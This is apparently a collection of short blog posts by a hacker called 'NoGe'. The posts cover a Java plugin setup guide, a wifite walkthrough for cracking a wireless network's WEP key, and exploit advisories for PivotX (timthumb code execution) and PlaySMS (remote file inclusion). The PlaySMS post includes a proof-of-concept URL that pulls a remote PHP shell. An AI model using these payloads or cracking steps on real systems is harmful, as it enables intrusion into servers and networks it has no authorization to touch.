Install Java Plugin

Download Java Runtime Environment for linux
http://www.java.com/en/download/linux_manual.jsp?locale=en
Choose Linux (self-extracting file)




Make folder java folder in /usr
root@evilc0de:/home/noge# cd /usr
root@evilc0de:/usr# mkdir java

copy jre-6u29-linux-i586.bin to /usr/java and extract it
root@evilc0de:/usr/java# ./jre-6u29-linux-i586.bin




Enable Java on Firefox

Go to /home/your_user/.mozilla
root@evilc0de:/usr/java# cd /home/noge/.mozilla

Make plugins directory
root@evilc0de:/home/noge/.mozilla# mkdir plugins
root@evilc0de:/home/noge/.mozilla# cd plugins

Make symbolic link to java plugin
root@evilc0de:/home/noge/.mozilla/plugins# ln -s /usr/java/jre1.6.0_29/lib/i386/libnpjp2.so

Open firefox type about:plugins on address bar and enter
You will see java plugin is enabled [Java(TM) Plug-in 1.6.0_29]




I hope this article usefull for who can't enable java plugin on firefox



./NoGe

this tool is design for backtrack4 so if you using another linux distro you need to install aircrack-ng first


lets get started
set your interface to monitor mode




run wifite

# python wifite.py

wifite will automatically detect available access point and client also your interface
press CTRL+C when you ready to attack



you will see all access point in your range
i just have 3 access point :(
now you can select which access point do you want to attack
if you want attack all access point in your range just type "all" and enter
in my case i will attack access point number 2 so i type "2" and enter



fake authentication successfull but my 2 attack not success :(
arp replay attack timeout and chop chop attack failed
wifite will automatically use another attack method like fragmentation attack



fragmentation attack require packetforge-ng to build keystream
if the capture packet is enough, wifite will automatically crack for a key
walla.. key found!! :))

now i can connect to access point




download wifite

download aircrack-ng

use this command to view help

# python wifite.py -h



./NoGe

[o] PivotX <= Remote Code Execution Vulnerability

Software : PivotX ver 2.2.6
Vendor : http://pivotx.net/
Original Author : MaXe [ http://www.exploit-db.com/exploits/17602/ ]



[o] Vulnerability

pivotx/includes/timthumb.php



[o] Exploit

http://localhost/pivotx/includes/timthumb.php?src=[RCE]



[o] Fix

Upgrade to new version (2.3.0)

hi folks..

i'm start to open penetration tester service for web application and web server.
why penetration tester? because security is very important things in a cyber world.
you don't wanna wake up in the morning and find out someone already steal your sensitive information from your database right? that's why i'm here to prevent things like that happen.


contact me for more details.. noge[dot]code[at]gmail[dot]com

[o] PlaySMS <= Remote File Inclusion Vulnerability

Software : PlaySMS ver 0.9.5.2
Vendor : http://playsms.org/
Author : NoGe


[o] Vulnerability

affected all this files

web/plugin/themes/default/page_forgot.php
web/plugin/themes/default/page_login.php
web/plugin/themes/default/page_noaccess.php
web/plugin/themes/default/page_register.php
web/plugin/themes/km2/page_noaccess.php
web/plugin/themes/work2/page_forgot.php
web/plugin/themes/work2/page_login.php
web/plugin/themes/work2/page_noaccess.php
web/plugin/themes/work2/page_register.php


[o] Exploit

http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=[RFI]


[o] PoC

http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=http://phpshell?